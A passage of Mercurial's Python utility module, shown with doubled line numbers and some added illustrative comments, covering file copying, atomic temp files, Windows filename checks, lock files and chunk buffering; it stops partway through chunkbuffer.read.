1570 1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1571 1571 obj.__dict__[self.name] = value
1572 1572
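# Illustrative sketch (not part of the original module): propertycache
# computes an attribute on first access, then stores the result in the
# instance __dict__ so later lookups bypass the descriptor entirely.
# 'repoish' and 'computeonce' are hypothetical.
#
#     class repoish(object):
#         @propertycache
#         def expensive(self):
#             return computeonce()
#
#     r = repoish()
#     r.expensive                          # computed, then cached
#     r.expensive                          # plain attribute lookup now
#     clearcachedproperty(r, 'expensive')  # drop it to force recompute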
1573 1573 def clearcachedproperty(obj, prop):
1574 1574 '''clear a cached property value, if one has been set'''
1575 1575 prop = pycompat.sysstr(prop)
1576 1576 if prop in obj.__dict__:
1577 1577 del obj.__dict__[prop]
1578 1578
1579 1579 def increasingchunks(source, min=1024, max=65536):
1580 1580 '''return no less than min bytes per chunk while data remains,
1581 1581 doubling min after each chunk until it reaches max'''
1582 1582 def log2(x):
1583 1583 if not x:
1584 1584 return 0
1585 1585 i = 0
1586 1586 while x:
1587 1587 x >>= 1
1588 1588 i += 1
1589 1589 return i - 1
1590 1590
1591 1591 buf = []
1592 1592 blen = 0
1593 1593 for chunk in source:
1594 1594 buf.append(chunk)
1595 1595 blen += len(chunk)
1596 1596 if blen >= min:
1597 1597 if min < max:
1598 1598 min = min << 1
1599 1599 nmin = 1 << log2(blen)
1600 1600 if nmin > min:
1601 1601 min = nmin
1602 1602 if min > max:
1603 1603 min = max
1604 1604 yield ''.join(buf)
1605 1605 blen = 0
1606 1606 buf = []
1607 1607 if buf:
1608 1608 yield ''.join(buf)
1609 1609
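# Illustrative sketch (not part of the original module): feeding many
# tiny chunks through increasingchunks() coalesces them into steadily
# growing output chunks.
#
#     source = ('x' * 100 for _ in range(100))     # 100 small chunks
#     for chunk in increasingchunks(source, min=1024, max=4096):
#         pass   # yields ~1100, ~2100, then ~4100-byte chunks, plus a
#                # final short chunk for whatever remains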
1610 1610 def always(fn):
1611 1611 return True
1612 1612
1613 1613 def never(fn):
1614 1614 return False
1615 1615
1616 1616 def nogc(func):
1617 1617 """disable garbage collector
1618 1618
1619 1619 Python's garbage collector triggers a GC each time a certain number of
1620 1620 container objects (the number being defined by gc.get_threshold()) are
1621 1621 allocated even when marked not to be tracked by the collector. Tracking has
1622 1622 no effect on when GCs are triggered, only on what objects the GC looks
1623 1623 into. As a workaround, disable GC while building complex (huge)
1624 1624 containers.
1625 1625
1626 1626 This garbage collector issue has been fixed in 2.7, but it still
1627 1627 affects CPython's performance.
1628 1628 """
1629 1629 def wrapper(*args, **kwargs):
1630 1630 gcenabled = gc.isenabled()
1631 1631 gc.disable()
1632 1632 try:
1633 1633 return func(*args, **kwargs)
1634 1634 finally:
1635 1635 if gcenabled:
1636 1636 gc.enable()
1637 1637 return wrapper
1638 1638
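# Illustrative sketch (not part of the original module): wrap a
# container-heavy builder so the collector stays off while it runs.
# 'entries' is a stand-in.
#
#     @nogc
#     def buildindex(entries):
#         return dict((e.key, e) for e in entries)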
1639 1639 if pycompat.ispypy:
1640 1640 # PyPy runs slower with gc disabled
1641 1641 nogc = lambda x: x
1642 1642
1643 1643 def pathto(root, n1, n2):
1644 1644 '''return the relative path from one place to another.
1645 1645 root should use os.sep to separate directories
1646 1646 n1 should use os.sep to separate directories
1647 1647 n2 should use "/" to separate directories
1648 1648 returns an os.sep-separated path.
1649 1649
1650 1650 If n1 is a relative path, it's assumed it's
1651 1651 relative to root.
1652 1652 n2 should always be relative to root.
1653 1653 '''
1654 1654 if not n1:
1655 1655 return localpath(n2)
1656 1656 if os.path.isabs(n1):
1657 1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1658 1658 return os.path.join(root, localpath(n2))
1659 1659 n2 = '/'.join((pconvert(root), n2))
1660 1660 a, b = splitpath(n1), n2.split('/')
1661 1661 a.reverse()
1662 1662 b.reverse()
1663 1663 while a and b and a[-1] == b[-1]:
1664 1664 a.pop()
1665 1665 b.pop()
1666 1666 b.reverse()
1667 1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1668 1668
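# Illustrative sketch (not part of the original module), on a POSIX
# system where os.sep is '/':
#
#     pathto('/repo', 'a/b', 'a/c/d')   # -> '../c/d'
#     pathto('/repo', '', 'a/c/d')      # -> 'a/c/d' (n1 empty)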
1669 1669 # the location of data files matching the source code
1670 1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1671 1671 # executable version (py2exe) doesn't support __file__
1672 1672 datapath = os.path.dirname(pycompat.sysexecutable)
1673 1673 else:
1674 1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1675 1675
1676 1676 i18n.setdatapath(datapath)
1677 1677
1678 1678 def checksignature(func):
1679 1679 '''wrap a function with code to check for calling errors'''
1680 1680 def check(*args, **kwargs):
1681 1681 try:
1682 1682 return func(*args, **kwargs)
1683 1683 except TypeError:
1684 1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1685 1685 raise error.SignatureError
1686 1686 raise
1687 1687
1688 1688 return check
1689 1689
1690 1690 # a whitelist of known filesystems where hardlinks work reliably
1691 1691 _hardlinkfswhitelist = {
1692 1692 'apfs',
1693 1693 'btrfs',
1694 1694 'ext2',
1695 1695 'ext3',
1696 1696 'ext4',
1697 1697 'hfs',
1698 1698 'jfs',
1699 1699 'NTFS',
1700 1700 'reiserfs',
1701 1701 'tmpfs',
1702 1702 'ufs',
1703 1703 'xfs',
1704 1704 'zfs',
1705 1705 }
1706 1706
1707 1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1708 1708 '''copy a file, preserving mode and optionally other stat info like
1709 1709 atime/mtime
1710 1710
1711 1711 The checkambig argument is used with filestat, and is useful only if
1712 1712 the destination file is guarded by a lock (e.g. repo.lock or
1713 1713 repo.wlock).
1714 1714
1715 1715 copystat and checkambig should be exclusive.
1716 1716 '''
1717 1717 assert not (copystat and checkambig)
1718 1718 oldstat = None
1719 1719 if os.path.lexists(dest):
1720 1720 if checkambig:
1721 1721 oldstat = filestat.frompath(dest)
1722 1722 unlink(dest)
1723 1723 if hardlink:
1724 1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1725 1725 # unless we are confident that dest is on a whitelisted filesystem.
1726 1726 try:
1727 1727 fstype = getfstype(os.path.dirname(dest))
1728 1728 except OSError:
1729 1729 fstype = None
1730 1730 if fstype not in _hardlinkfswhitelist:
1731 1731 hardlink = False
1732 1732 if hardlink:
1733 1733 try:
1734 1734 oslink(src, dest)
1735 1735 return
1736 1736 except (IOError, OSError):
1737 1737 pass # fall back to normal copy
1738 1738 if os.path.islink(src):
1739 1739 os.symlink(os.readlink(src), dest)
1740 1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1741 1741 # for them anyway
1742 1742 else:
1743 1743 try:
1744 1744 shutil.copyfile(src, dest)
1745 1745 if copystat:
1746 1746 # copystat also copies mode
1747 1747 shutil.copystat(src, dest)
1748 1748 else:
1749 1749 shutil.copymode(src, dest)
1750 1750 if oldstat and oldstat.stat:
1751 1751 newstat = filestat.frompath(dest)
1752 1752 if newstat.isambig(oldstat):
1753 1753 # stat of copied file is ambiguous to original one
1754 1754 advanced = (
1755 1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1756 1756 os.utime(dest, (advanced, advanced))
1757 1757 except shutil.Error as inst:
1758 1758 raise error.Abort(str(inst))
1759 1759
1760 1760 def copyfiles(src, dst, hardlink=None, progress=None):
1761 1761 """Copy a directory tree using hardlinks if possible."""
1762 1762 num = 0
1763 1763
1764 1764 def settopic():
1765 1765 if progress:
1766 1766 progress.topic = _('linking') if hardlink else _('copying')
1767 1767
1768 1768 if os.path.isdir(src):
1769 1769 if hardlink is None:
1770 1770 hardlink = (os.stat(src).st_dev ==
1771 1771 os.stat(os.path.dirname(dst)).st_dev)
1772 1772 settopic()
1773 1773 os.mkdir(dst)
1774 1774 for name, kind in listdir(src):
1775 1775 srcname = os.path.join(src, name)
1776 1776 dstname = os.path.join(dst, name)
1777 1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1778 1778 num += n
1779 1779 else:
1780 1780 if hardlink is None:
1781 1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1782 1782 os.stat(os.path.dirname(dst)).st_dev)
1783 1783 settopic()
1784 1784
1785 1785 if hardlink:
1786 1786 try:
1787 1787 oslink(src, dst)
1788 1788 except (IOError, OSError):
1789 1789 hardlink = False
1790 1790 shutil.copy(src, dst)
1791 1791 else:
1792 1792 shutil.copy(src, dst)
1793 1793 num += 1
1794 1794 if progress:
1795 1795 progress.increment()
1796 1796
1797 1797 return hardlink, num
1798 1798
1799 1799 _winreservednames = {
1800 1800 'con', 'prn', 'aux', 'nul',
1801 1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1802 1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1803 1803 }
1804 1804 _winreservedchars = ':*?"<>|'
1805 1805 def checkwinfilename(path):
1806 1806 r'''Check that the base-relative path is a valid filename on Windows.
1807 1807 Returns None if the path is ok, or a UI string describing the problem.
1808 1808
1809 1809 >>> checkwinfilename(b"just/a/normal/path")
1810 1810 >>> checkwinfilename(b"foo/bar/con.xml")
1811 1811 "filename contains 'con', which is reserved on Windows"
1812 1812 >>> checkwinfilename(b"foo/con.xml/bar")
1813 1813 "filename contains 'con', which is reserved on Windows"
1814 1814 >>> checkwinfilename(b"foo/bar/xml.con")
1815 1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1816 1816 "filename contains 'AUX', which is reserved on Windows"
1817 1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1818 1818 "filename contains ':', which is reserved on Windows"
1819 1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1820 1820 "filename contains '\\x07', which is invalid on Windows"
1821 1821 >>> checkwinfilename(b"foo/bar/bla ")
1822 1822 "filename ends with ' ', which is not allowed on Windows"
1823 1823 >>> checkwinfilename(b"../bar")
1824 1824 >>> checkwinfilename(b"foo\\")
1825 1825 "filename ends with '\\', which is invalid on Windows"
1826 1826 >>> checkwinfilename(b"foo\\/bar")
1827 1827 "directory name ends with '\\', which is invalid on Windows"
1828 1828 '''
1829 1829 if path.endswith('\\'):
1830 1830 return _("filename ends with '\\', which is invalid on Windows")
1831 1831 if '\\/' in path:
1832 1832 return _("directory name ends with '\\', which is invalid on Windows")
1833 1833 for n in path.replace('\\', '/').split('/'):
1834 1834 if not n:
1835 1835 continue
1836 1836 for c in _filenamebytestr(n):
1837 1837 if c in _winreservedchars:
1838 1838 return _("filename contains '%s', which is reserved "
1839 1839 "on Windows") % c
1840 1840 if ord(c) <= 31:
1841 1841 return _("filename contains '%s', which is invalid "
1842 1842 "on Windows") % stringutil.escapestr(c)
1843 1843 base = n.split('.')[0]
1844 1844 if base and base.lower() in _winreservednames:
1845 1845 return _("filename contains '%s', which is reserved "
1846 1846 "on Windows") % base
1847 1847 t = n[-1:]
1848 1848 if t in '. ' and n not in '..':
1849 1849 return _("filename ends with '%s', which is not allowed "
1850 1850 "on Windows") % t
1851 1851
1852 1852 if pycompat.iswindows:
1853 1853 checkosfilename = checkwinfilename
1854 1854 timer = time.clock
1855 1855 else:
1856 1856 checkosfilename = platform.checkosfilename
1857 1857 timer = time.time
1858 1858
1859 1859 if safehasattr(time, "perf_counter"):
1860 1860 timer = time.perf_counter
1861 1861
1862 1862 def makelock(info, pathname):
1863 1863 """Create a lock file atomically if possible
1864 1864
1865 1865 This may leave a stale lock file if symlinks aren't supported and the
1866 1866 non-atomic fallback write is interrupted by a signal.
1867 1867 """
1868 1868 try:
1869 1869 return os.symlink(info, pathname)
1870 1870 except OSError as why:
1871 1871 if why.errno == errno.EEXIST:
1872 1872 raise
1873 1873 except AttributeError: # no symlink in os
1874 1874 pass
1875 1875
1876 1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1877 1877 ld = os.open(pathname, flags)
1878 1878 os.write(ld, info)
1879 1879 os.close(ld)
1880 1880
1881 1881 def readlock(pathname):
1882 1882 try:
1883 1883 return readlink(pathname)
1884 1884 except OSError as why:
1885 1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1886 1886 raise
1887 1887 except AttributeError: # no symlink in os
1888 1888 pass
1889 1889 with posixfile(pathname, 'rb') as fp:
1890 1890 return fp.read()
1891 1891
1892 1892 def fstat(fp):
1893 1893 '''stat a file object that may not have a fileno method.'''
1894 1894 try:
1895 1895 return os.fstat(fp.fileno())
1896 1896 except AttributeError:
1897 1897 return os.stat(fp.name)
1898 1898
1899 1899 # File system features
1900 1900
1901 1901 def fscasesensitive(path):
1902 1902 """
1903 1903 Return true if the given path is on a case-sensitive filesystem
1904 1904
1905 1905 Requires a path (like /foo/.hg) ending with a foldable final
1906 1906 directory component.
1907 1907 """
1908 1908 s1 = os.lstat(path)
1909 1909 d, b = os.path.split(path)
1910 1910 b2 = b.upper()
1911 1911 if b == b2:
1912 1912 b2 = b.lower()
1913 1913 if b == b2:
1914 1914 return True # no evidence against case sensitivity
1915 1915 p2 = os.path.join(d, b2)
1916 1916 try:
1917 1917 s2 = os.lstat(p2)
1918 1918 if s2 == s1:
1919 1919 return False
1920 1920 return True
1921 1921 except OSError:
1922 1922 return True
1923 1923
1924 1924 try:
1925 1925 import re2
1926 1926 _re2 = None
1927 1927 except ImportError:
1928 1928 _re2 = False
1929 1929
1930 1930 class _re(object):
1931 1931 def _checkre2(self):
1932 1932 global _re2
1933 1933 try:
1934 1934 # check if match works, see issue3964
1935 1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1936 1936 except ImportError:
1937 1937 _re2 = False
1938 1938
1939 1939 def compile(self, pat, flags=0):
1940 1940 '''Compile a regular expression, using re2 if possible
1941 1941
1942 1942 For best performance, use only re2-compatible regexp features. The
1943 1943 only flags from the re module that are re2-compatible are
1944 1944 IGNORECASE and MULTILINE.'''
1945 1945 if _re2 is None:
1946 1946 self._checkre2()
1947 1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1948 1948 if flags & remod.IGNORECASE:
1949 1949 pat = '(?i)' + pat
1950 1950 if flags & remod.MULTILINE:
1951 1951 pat = '(?m)' + pat
1952 1952 try:
1953 1953 return re2.compile(pat)
1954 1954 except re2.error:
1955 1955 pass
1956 1956 return remod.compile(pat, flags)
1957 1957
1958 1958 @propertycache
1959 1959 def escape(self):
1960 1960 '''Return the version of escape corresponding to self.compile.
1961 1961
1962 1962 This is imperfect because whether re2 or re is used for a particular
1963 1963 function depends on the flags, etc, but it's the best we can do.
1964 1964 '''
1965 1965 global _re2
1966 1966 if _re2 is None:
1967 1967 self._checkre2()
1968 1968 if _re2:
1969 1969 return re2.escape
1970 1970 else:
1971 1971 return remod.escape
1972 1972
1973 1973 re = _re()
1974 1974
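# Illustrative sketch (not part of the original module): util.re.compile
# prefers re2 when the bindings import and the flags are compatible,
# silently falling back to the stdlib engine otherwise. Flags are folded
# into the pattern because re2 only understands inline (?i)/(?m).
#
#     r = re.compile(br'ba[rz]', remod.IGNORECASE)
#     r.match(b'BAZ')    # matches with either engine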
1975 1975 _fspathcache = {}
1976 1976 def fspath(name, root):
1977 1977 '''Get name in the case stored in the filesystem
1978 1978
1979 1979 The name should be relative to root, and be normcase-ed for efficiency.
1980 1980
1981 1981 Note that this function is unnecessary, and should not be
1982 1982 called, for case-sensitive filesystems (simply because it's expensive).
1983 1983
1984 1984 The root should be normcase-ed, too.
1985 1985 '''
1986 1986 def _makefspathcacheentry(dir):
1987 1987 return dict((normcase(n), n) for n in os.listdir(dir))
1988 1988
1989 1989 seps = pycompat.ossep
1990 1990 if pycompat.osaltsep:
1991 1991 seps = seps + pycompat.osaltsep
1992 1992 # Protect backslashes. This gets silly very quickly.
1993 1993 seps = seps.replace('\\','\\\\')
1994 1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1995 1995 dir = os.path.normpath(root)
1996 1996 result = []
1997 1997 for part, sep in pattern.findall(name):
1998 1998 if sep:
1999 1999 result.append(sep)
2000 2000 continue
2001 2001
2002 2002 if dir not in _fspathcache:
2003 2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2004 2004 contents = _fspathcache[dir]
2005 2005
2006 2006 found = contents.get(part)
2007 2007 if not found:
2008 2008 # retry "once per directory" per "dirstate.walk", which may take
2009 2009 # place for each patch of "hg qpush", for example
2010 2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2011 2011 found = contents.get(part)
2012 2012
2013 2013 result.append(found or part)
2014 2014 dir = os.path.join(dir, part)
2015 2015
2016 2016 return ''.join(result)
2017 2017
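# Illustrative sketch (not part of the original module): on a
# case-insensitive filesystem where the file is stored as 'Foo/Bar.txt'
# under '/repo' (both arguments already normcase-ed):
#
#     fspath('foo/bar.txt', '/repo')   # -> 'Foo/Bar.txt'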
2018 2018 def checknlink(testfile):
2019 2019 '''check whether hardlink count reporting works properly'''
2020 2020
2021 2021 # testfile may be open, so we need a separate file for checking to
2022 2022 # work around issue2543 (or testfile may get lost on Samba shares)
2023 2023 f1, f2, fp = None, None, None
2024 2024 try:
2025 2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2026 2026 suffix='1~', dir=os.path.dirname(testfile))
2027 2027 os.close(fd)
2028 2028 f2 = '%s2~' % f1[:-2]
2029 2029
2030 2030 oslink(f1, f2)
2031 2031 # nlinks() may behave differently for files on Windows shares if
2032 2032 # the file is open.
2033 2033 fp = posixfile(f2)
2034 2034 return nlinks(f2) > 1
2035 2035 except OSError:
2036 2036 return False
2037 2037 finally:
2038 2038 if fp is not None:
2039 2039 fp.close()
2040 2040 for f in (f1, f2):
2041 2041 try:
2042 2042 if f is not None:
2043 2043 os.unlink(f)
2044 2044 except OSError:
2045 2045 pass
2046 2046
2047 2047 def endswithsep(path):
2048 2048 '''Check path ends with os.sep or os.altsep.'''
2049 2049 return (path.endswith(pycompat.ossep)
2050 2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2051 2051
2052 2052 def splitpath(path):
2053 2053 '''Split path by os.sep.
2054 2054 Note that this function does not use os.altsep because this is
2055 2055 an alternative to a simple "xxx.split(os.sep)".
2056 2056 It is recommended to use os.path.normpath() before using this
2057 2057 function if needed.'''
2058 2058 return path.split(pycompat.ossep)
2059 2059
2060 2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2061 2061 """Create a temporary file with the same contents from name
2062 2062
2063 2063 The permission bits are copied from the original file.
2064 2064
2065 2065 If the temporary file is going to be truncated immediately, you
2066 2066 can use emptyok=True as an optimization.
2067 2067
2068 2068 Returns the name of the temporary file.
2069 2069 """
2070 2070 d, fn = os.path.split(name)
2071 2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2072 2072 os.close(fd)
2073 2073 # Temporary files are created with mode 0600, which is usually not
2074 2074 # what we want. If the original file already exists, just copy
2075 2075 # its mode. Otherwise, manually obey umask.
2076 2076 copymode(name, temp, createmode, enforcewritable)
2077 2077
2078 2078 if emptyok:
2079 2079 return temp
2080 2080 try:
2081 2081 try:
2082 2082 ifp = posixfile(name, "rb")
2083 2083 except IOError as inst:
2084 2084 if inst.errno == errno.ENOENT:
2085 2085 return temp
2086 2086 if not getattr(inst, 'filename', None):
2087 2087 inst.filename = name
2088 2088 raise
2089 2089 ofp = posixfile(temp, "wb")
2090 2090 for chunk in filechunkiter(ifp):
2091 2091 ofp.write(chunk)
2092 2092 ifp.close()
2093 2093 ofp.close()
2094 2094 except: # re-raises
2095 2095 try:
2096 2096 os.unlink(temp)
2097 2097 except OSError:
2098 2098 pass
2099 2099 raise
2100 2100 return temp
2101 2101
2102 2102 class filestat(object):
2103 2103 """help to exactly detect change of a file
2104 2104
2105 2105 'stat' attribute is result of 'os.stat()' if specified 'path'
2106 2106 exists. Otherwise, it is None. This can avoid preparative
2107 2107 'exists()' examination on client side of this class.
2108 2108 """
2109 2109 def __init__(self, stat):
2110 2110 self.stat = stat
2111 2111
2112 2112 @classmethod
2113 2113 def frompath(cls, path):
2114 2114 try:
2115 2115 stat = os.stat(path)
2116 2116 except OSError as err:
2117 2117 if err.errno != errno.ENOENT:
2118 2118 raise
2119 2119 stat = None
2120 2120 return cls(stat)
2121 2121
2122 2122 @classmethod
2123 2123 def fromfp(cls, fp):
2124 2124 stat = os.fstat(fp.fileno())
2125 2125 return cls(stat)
2126 2126
2127 2127 __hash__ = object.__hash__
2128 2128
2129 2129 def __eq__(self, old):
2130 2130 try:
2131 2131 # if ambiguity between stat of new and old file is
2132 2132 # avoided, comparison of size, ctime and mtime is enough
2133 2133 # to exactly detect change of a file regardless of platform
2134 2134 return (self.stat.st_size == old.stat.st_size and
2135 2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2136 2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2137 2137 except AttributeError:
2138 2138 pass
2139 2139 try:
2140 2140 return self.stat is None and old.stat is None
2141 2141 except AttributeError:
2142 2142 return False
2143 2143
2144 2144 def isambig(self, old):
2145 2145 """Examine whether new (= self) stat is ambiguous against old one
2146 2146
2147 2147 "S[N]" below means stat of a file at N-th change:
2148 2148
2149 2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2150 2150 - S[n-1].ctime == S[n].ctime
2151 2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2152 2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2153 2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2154 2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2155 2155
2156 2156 Case (*2) above means that a file was changed twice or more within
2157 2157 the same second (= S[n-1].ctime), so comparing timestamps alone is
2158 2158 ambiguous.
2159 2159
2160 2160 The basic idea for avoiding such ambiguity is to "advance mtime by
2161 2161 1 sec, if the timestamp is ambiguous".
2162 2162
2163 2163 But advancing mtime only in case (*2) doesn't work as
2164 2164 expected, because a naturally advanced S[n].mtime in case (*1)
2165 2165 might equal a manually advanced S[n-1 or earlier].mtime.
2166 2166
2167 2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2168 2168 treated as ambiguous regardless of mtime, to avoid overlooking
2169 2169 changes masked by such colliding mtimes.
2170 2170
2171 2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2172 2172 S[n].mtime", even if size of a file isn't changed.
2173 2173 """
2174 2174 try:
2175 2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2176 2176 except AttributeError:
2177 2177 return False
2178 2178
2179 2179 def avoidambig(self, path, old):
2180 2180 """Change file stat of specified path to avoid ambiguity
2181 2181
2182 2182 'old' should be previous filestat of 'path'.
2183 2183
2184 2184 This skips avoiding ambiguity if the process doesn't have
2185 2185 appropriate privileges for 'path', and returns False in that
2186 2186 case.
2187 2187
2188 2188 Otherwise, this returns True, as "ambiguity is avoided".
2189 2189 """
2190 2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2191 2191 try:
2192 2192 os.utime(path, (advanced, advanced))
2193 2193 except OSError as inst:
2194 2194 if inst.errno == errno.EPERM:
2195 2195 # utime() on the file created by another user causes EPERM,
2196 2196 # if a process doesn't have appropriate privileges
2197 2197 return False
2198 2198 raise
2199 2199 return True
2200 2200
2201 2201 def __ne__(self, other):
2202 2202 return not self == other
2203 2203
2204 2204 class atomictempfile(object):
2205 2205 '''writable file object that atomically updates a file
2206 2206
2207 2207 All writes will go to a temporary copy of the original file. Call
2208 2208 close() when you are done writing, and atomictempfile will rename
2209 2209 the temporary copy to the original name, making the changes
2210 2210 visible. If the object is destroyed without being closed, all your
2211 2211 writes are discarded.
2212 2212
2213 2213 The checkambig argument of the constructor is used with filestat, and
2214 2214 is useful only if the target file is guarded by a lock (e.g. repo.lock
2215 2215 or repo.wlock).
2216 2216 '''
2217 2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2218 2218 self.__name = name # permanent name
2219 2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2220 2220 createmode=createmode,
2221 2221 enforcewritable=('w' in mode))
2222 2222
2223 2223 self._fp = posixfile(self._tempname, mode)
2224 2224 self._checkambig = checkambig
2225 2225
2226 2226 # delegated methods
2227 2227 self.read = self._fp.read
2228 2228 self.write = self._fp.write
2229 2229 self.seek = self._fp.seek
2230 2230 self.tell = self._fp.tell
2231 2231 self.fileno = self._fp.fileno
2232 2232
2233 2233 def close(self):
2234 2234 if not self._fp.closed:
2235 2235 self._fp.close()
2236 2236 filename = localpath(self.__name)
2237 2237 oldstat = self._checkambig and filestat.frompath(filename)
2238 2238 if oldstat and oldstat.stat:
2239 2239 rename(self._tempname, filename)
2240 2240 newstat = filestat.frompath(filename)
2241 2241 if newstat.isambig(oldstat):
2242 2242 # stat of changed file is ambiguous to original one
2243 2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2244 2244 os.utime(filename, (advanced, advanced))
2245 2245 else:
2246 2246 rename(self._tempname, filename)
2247 2247
2248 2248 def discard(self):
2249 2249 if not self._fp.closed:
2250 2250 try:
2251 2251 os.unlink(self._tempname)
2252 2252 except OSError:
2253 2253 pass
2254 2254 self._fp.close()
2255 2255
2256 2256 def __del__(self):
2257 2257 if safehasattr(self, '_fp'): # constructor actually did something
2258 2258 self.discard()
2259 2259
2260 2260 def __enter__(self):
2261 2261 return self
2262 2262
2263 2263 def __exit__(self, exctype, excvalue, traceback):
2264 2264 if exctype is not None:
2265 2265 self.discard()
2266 2266 else:
2267 2267 self.close()
2268 2268
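# Illustrative sketch (not part of the original module): all writes land
# in a temporary file; the rename in close() publishes them atomically.
#
#     with atomictempfile('data.bin', 'wb') as fp:
#         fp.write(b'all or nothing')
#     # normal exit: the temp file is renamed over 'data.bin';
#     # an exception inside the block discards the temp file instead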
2269 2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2270 2270 """unlink and remove the directory if it is empty"""
2271 2271 if ignoremissing:
2272 2272 tryunlink(f)
2273 2273 else:
2274 2274 unlink(f)
2275 2275 if rmdir:
2276 2276 # try removing directories that might now be empty
2277 2277 try:
2278 2278 removedirs(os.path.dirname(f))
2279 2279 except OSError:
2280 2280 pass
2281 2281
2282 2282 def tryunlink(f):
2283 2283 """Attempt to remove a file, ignoring ENOENT errors."""
2284 2284 try:
2285 2285 unlink(f)
2286 2286 except OSError as e:
2287 2287 if e.errno != errno.ENOENT:
2288 2288 raise
2289 2289
2290 2290 def makedirs(name, mode=None, notindexed=False):
2291 2291 """recursive directory creation with parent mode inheritance
2292 2292
2293 2293 Newly created directories are marked as "not to be indexed by
2294 2294 the content indexing service", if ``notindexed`` is specified
2295 2295 for "write" mode access.
2296 2296 """
2297 2297 try:
2298 2298 makedir(name, notindexed)
2299 2299 except OSError as err:
2300 2300 if err.errno == errno.EEXIST:
2301 2301 return
2302 2302 if err.errno != errno.ENOENT or not name:
2303 2303 raise
2304 2304 parent = os.path.dirname(os.path.abspath(name))
2305 2305 if parent == name:
2306 2306 raise
2307 2307 makedirs(parent, mode, notindexed)
2308 2308 try:
2309 2309 makedir(name, notindexed)
2310 2310 except OSError as err:
2311 2311 # Catch EEXIST to handle races
2312 2312 if err.errno == errno.EEXIST:
2313 2313 return
2314 2314 raise
2315 2315 if mode is not None:
2316 2316 os.chmod(name, mode)
2317 2317
2318 2318 def readfile(path):
2319 2319 with open(path, 'rb') as fp:
2320 2320 return fp.read()
2321 2321
2322 2322 def writefile(path, text):
2323 2323 with open(path, 'wb') as fp:
2324 2324 fp.write(text)
2325 2325
2326 2326 def appendfile(path, text):
2327 2327 with open(path, 'ab') as fp:
2328 2328 fp.write(text)
2329 2329
2330 2330 class chunkbuffer(object):
2331 2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2332 2332 iterator over chunks of arbitrary size."""
2333 2333
2334 2334 def __init__(self, in_iter):
2335 2335 """in_iter is the iterator that's iterating over the input chunks."""
2336 2336 def splitbig(chunks):
2337 2337 for chunk in chunks:
2338 2338 if len(chunk) > 2**20:
2339 2339 pos = 0
2340 2340 while pos < len(chunk):
2341 2341 end = pos + 2 ** 18
2342 2342 yield chunk[pos:end]
2343 2343 pos = end
2344 2344 else:
2345 2345 yield chunk
2346 2346 self.iter = splitbig(in_iter)
2347 2347 self._queue = collections.deque()
2348 2348 self._chunkoffset = 0
2349 2349
2350 2350 def read(self, l=None):
2351 2351 """Read L bytes of data from the iterator of chunks of data.
2352 2352 Returns less than L bytes if the iterator runs dry.
2353 2353
2354 2354 If the size parameter is omitted, read everything."""
2355 2355 if l is None:
2356 2356 return ''.join(self.iter)
2357 2357
2358 2358 left = l
2359 2359 buf = []
2360 2360 queue = self._queue
2361 2361 while left > 0:
2362 2362 # refill the queue
2363 2363 if not queue:
2364 2364 target = 2**18
2365 2365 for chunk in self.iter:
2366 2366 queue.append(chunk)
2367 2367 target -= len(chunk)
2368 2368 if target <= 0:
2369 2369 break
2370 2370 if not queue:
2371 2371 break
2372 2372
2373 2373 # The easy way to do this would be to queue.popleft(), modify the
2374 2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2375 2375 # where we read partial chunk content, this incurs 2 dequeue
2376 2376 # mutations and creates a new str for the remaining chunk in the
2377 2377 # queue. Our code below avoids this overhead.
2378 2378
2379 2379 chunk = queue[0]
2380 2380 chunkl = len(chunk)
2381 2381 offset = self._chunkoffset
2382 2382
2383 2383 # Use full chunk.
2384 2384 if offset == 0 and left >= chunkl:
2385 2385 left -= chunkl
